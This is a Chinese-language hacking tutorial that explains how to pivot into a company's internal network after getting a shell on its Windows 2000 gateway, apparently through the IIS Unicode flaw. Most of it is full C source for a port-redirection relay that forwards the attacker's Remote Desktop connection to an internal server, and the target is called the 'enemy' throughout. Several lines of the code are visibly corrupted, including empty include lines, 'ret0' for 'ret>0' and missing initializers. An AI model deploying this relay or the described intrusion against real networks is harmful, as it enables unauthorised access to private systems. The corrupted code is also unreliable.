从源程序看原理:突破防火墙入侵内网

【 tulaoshi.com - 编程语言 】

现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路，宽带、DDN、ADSL、ISDN等等，然后用一台服务器做网关，服务器两块网卡，一块是连接到Internet，另一块是连接到内网的HUB或者交换机,然后内网的其他机器就可以通过网关连接到Internet。也许有些人会这样想，我在内网之中，我们之间没有直接的连接，你没有办法攻击我。事实并非如此，在内网的机器同样可能遭受到来自Internet的攻击，当然前提是攻击者已经取得网关服务器的某些权限，呵呵，这是不是废话？其实，Internet上很多做网关的服务器并未经过严格的安全配置，要获取权限也不是想象中的那么难。
　　
　　Ok!废话就不说了，切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程治理工具，不是吗？呵呵。没有做非凡说明的话，文中提到的服务器OS都为windows 2000。服务器为Linux或其他的话，原理也差不多，把程序稍微修改就行了。
　　
　　第一部分：利用TCP socket数据转发进入没有防火墙保护的内网
　　
　　假设敌人网络拓扑如下图所示，没有安装防火墙或在网关服务器上做TCP/IP限制。
　　
　　我们的目标是连接上敌人内网的Terminal
　　
　　Server[192.168.1.3]，因为没有办法直接和他建立连接，那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k，IIS有Unicode漏洞[现在要找些有漏洞的机器太轻易了，但我只是scripts kid，只会利用现成的漏洞做些简单的攻击：（555），那么我们就得到一个网关的shell了，我们可以在那上面运行我们的程序，虽然权限很低，但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序，让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话：实际入侵过程是先取得网关服务器的权限，然后用他做跳板，进一步摸清它的内部网络拓扑结构，再做进一步的入侵，现在敌人的网络拓扑是我们给他设计的，哈哈。
　　

　　攻击流程如下：
　　
　　1在网关服务器202.2.2.2运行我们的程序AgentGateWay，他监听TCP 3389端口[改成别的，那我们就要相应的修改TermClient了]等待我们去连接。
　　
　　2我们202.1.1.1用TermClient连接到202.2.2.2:3389。
　　
　　3202.2.2.2.接受202.1.1.1的连接，然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]
　　
　　4这样我们和敌人内网的TermServer之间的数据通道就建好了，接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候，其实出来的界面是敌人内网的192.168.1.3，感觉怎么样？：）
　　
　　程序代码如下：
　　/*
　　Module Name:AgentGateWay.c
　　CopyRight(c) eyas
　　说明：端口重定向工具，在网关上运行，把端口重定向到内网的IP、PORT，
　　就可以进入内网了
　　sock[0]==sClient sock[1]==sTarget
　　*/
　　#include
　　#include
　　#include "TCPDataRedird.c"
　　#define TargetIP TEXT("192.168.1.3")
　　#define TargetPort (int)3389
　　#define ListenPort (int)3389//监听端口
　　#pragma comment(lib,"ws2_32.lib")
　　int main()
　　{
　　WSADATA wsd;
　　SOCKET sListen=INVALID_SOCKET,//本机监听的socket
　　sock[2];
　　strUCt sockaddr_in Local,Client,Target;
　　int iAddrSize;
　　HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
　　hThreadT2C=NULL;//T2C=TargetToClient
　　DWord dwThreadID;
　　__try
　　{
　　if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
　　{
　　printf("WSAStartup() failed:%d",GetLastError());
　　__leave;
　　}
　　sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
　　if(sListen==INVALID_SOCKET)
　　{
　　printf("socket() failed:%d",GetLastError());
　　__leave;
　　}
　　Local.sin_addr.s_addr=htonl(INADDR_ANY);
　　
　　 Local.sin_family=AF_INET;
　　Local.sin_port=htons(ListenPort);
　　
　　Target.sin_family=AF_INET;
　　Target.sin_addr.s_addr=inet_addr(TargetIP);
　　Target.sin_port=htons(TargetPort);
　　
　　if(bind(sListen,(struct sockaddr
　　*)&Local,sizeof(Local))==SOCKET_ERROR)
　　{
　　printf("bind() failed:%d",GetLastError());
　　__leave;
　　}
　　if(listen(sListen,1)==SOCKET_ERROR)
　　{
　　printf("listen() failed:%d",GetLastError());
　　__leave;
　　}
　　//scoket循环
　　while(1)
　　{
　　printf("*************Waiting Client Connect
　　to**************");
　　iAddrSize=sizeof(Client);
　　//get socket sClient
　　sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
　　if(sock[0]==INVALID_SOCKET)
　　{
　　printf("accept() failed:%d",GetLastError());
　　break;
　　}
　　printf("Accept client==%s:%d",inet_ntoa(Client.sin_addr),
　　ntohs(Client.sin_port));
　　//create socket sTarget
　　sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
　　if(sock[1]==INVALID_SOCKET)
　　{
　　printf("socket() failed:%d",GetLastError());
　　__leave;
　　}
　　//connect to target port
　　if(connect(sock[1],(struct sockaddr
　　*)&Target,sizeof(Target))==SOCKET_ERROR)
　　{
　　printf("connect() failed:%d",GetLastError());
　　__leave;
　　}
　　printf("connect to target 3389 success!");
　　//创建两个线程进行数据转发
　　hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
　　hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
　　//等待两个线程结束
　　WaitForSingleObject(hThreadC2T,INFINITE);
　　WaitForSingleObject(hThreadT2C,INFINITE);
　　CloseHandle(hThreadC2T);
　　CloseHandle(hThreadT2C);
　　closesocket(sock[1]);
　　closesocket(sock[0]);
　　printf("*****************Connection
　　Close*******************");
　　}//end of sock外循环
　　}//end of try
　　__finally
　　{
　　if(sListen!=INVALID_SOCKET) closesocket(sListen);
　　if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
　　if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
　　if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
　　if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
　　WSACleanup();
　　}
　　return 0;
　　}
　　/******
　　Module:TCPDataRedird.c
　　CopyRight(c) eyas
　　HomePage:www.patching.net
　　Thanks to shotgun
　　说明:TCP socket数据转发,sock[0]==sClient sock[1]==sTarget
　　********/
　　#define BuffSize 20*1024 //缓冲区大小20k 
　　 //此函数负责从Client读取数据，然后转发给Target
　　DWORD WINAPI TCPDataC2T(SOCKET* sock)
　　{
　　int iRet,
　　ret=-1,//select 返回值
　　iLeft,
　　idx,
　　iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
　　char szSendToTargetBuff[BuffSize]=,
　　szRecvFromClientBuff[BuffSize]=;
　　fd_set fdread,fdwrite;
　　printf("*****************Connection
　　Active*******************");
　　while(1)
　　{
　　FD_ZERO(&fdread);
　　FD_ZERO(&fdwrite);
　　FD_SET(sock[0],&fdread);
　　FD_SET(sock[1],&fdwrite);
　　if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
　　
　　 {
　　printf("select() failed:%d",GetLastError());
　　break;
　　}
　　//printf("select() return value ret=%d",ret);
　　if(ret0)
　　{
　　//sClinet可读，client有数据要发送过来
　　if(FD_ISSET(sock[0],&fdread))
　　{
　　//接收sock[0]发送来的数据
　　iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);
　　if(iRet==SOCKET_ERROR)
　　{
　　printf("recv() from sock[0] failed:%d",GetLastError());
　　break;
　　}
　　else if(iRet==0)
　　break;
　　printf("recv %d bytes from sClinet.",iRet);
　　//把从client接收到的数据存添加到发往target的缓冲区
　　memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);
　　//刷新发往target的数据缓冲区当前buff大小
　　iSTTBCS+=iRet;
　　//清空接收client数据的缓冲区
　　memset(szRecvFromClientBuff,0,BuffSize);
　　}
　　//sTarget可写，把从client接收到的数据发送到target
　　if(FD_ISSET(sock[1],&fdwrite))
　　{
　　//转发数据到target的3389端口
　　iLeft=iSTTBCS;
　　idx=0;
　　while(iLeft0)
　　{
　　iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);
　　if(iRet==SOCKET_ERROR)
　　{
　　printf("send() to target failed:%d",GetLastError());
　　break;
　　}
　　printf("send %d bytes to target",iRet);
　　iLeft-=iRet;
　　idx+=iRet;
　　}
　　//清空缓冲区
　　memset(szSendToTargetBuff,0,BuffSize);
　　//重置发往target的数据缓冲区当前buff大小
　　iSTTBCS=0;
　　}
　　}//end of select ret
　　Sleep(1);
　　}//end of data send & recv循环
　　return 0;
　　}
　　//此函数负责从target读取数据，然后发送给client
　　DWORD WINAPI TCPDataT2C(SOCKET* sock)
　　{
　　int iRet,
　　ret=-1,//select 返回值
　　iLeft,
　　idx,
　　iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize
　　char szRecvFromTargetBuff[BuffSize]=,
　　szSendToClientBuff[BuffSize]=;
　　fd_set fdread,fdwrite;
　　
　　while(1)
　　{
　　FD_ZERO(&fdread);
　　FD_ZERO(&fdwrite);
　　FD_SET(sock[0],&fdwrite);
　　FD_SET(sock[1],&fdread);
　　if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
　　{
　　printf("select() failed:%d",GetLastError());
　　break;
　　}
　　if(ret0)
　　{
　　//sTarget可读，从target接收数据
　　if(FD_ISSET(sock[1],&fdread))
　　{
　　//接收target返回数据
　　iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);
　　if(iRet==SOCKET_ERROR)
　　{
　　printf("recv() from target failed:%d",GetLastError());
　　break;
　　}
　　else if(iRet==0)
　　break;
　　printf("recv %d bytes from target",iRet);
　　//把从target接收到的数据添加到发送到client的缓冲区
　　memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);
　　//清空接收target返回数据缓冲区
　　memset(szRecvFromTargetBuff,0,BuffSize);
　　//刷新发送到client的数据缓冲区当前大小
　　iSTCBCS+=iRet;
　　}
　　//client可写，发送target返回数据到client
　　if(FD_ISSET(sock[0],&fdwrite))
　　{
　　//发送target返回数据到client
　　iLeft=iSTCBCS;
　　idx=0;
　　while(iLeft0)
　　{
　　iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);
　　if(iRet==SOCKET_ERROR)
　　{
　　printf("send() to Client failed:%d",GetLastError());
　　break;
　　}
　　printf("send %d bytes to Client",iRet);
　　iLeft-=iRet;
　　idx+=iRet;
　　}
　　//清空缓冲区
　　memset(szSendToClientBuff,0,BuffSize);
　　iSTCBCS=0;
　　
　　 }
　　}//end of select ret
　　Sleep(1);
　　}//end of while
　　return 0;
　　}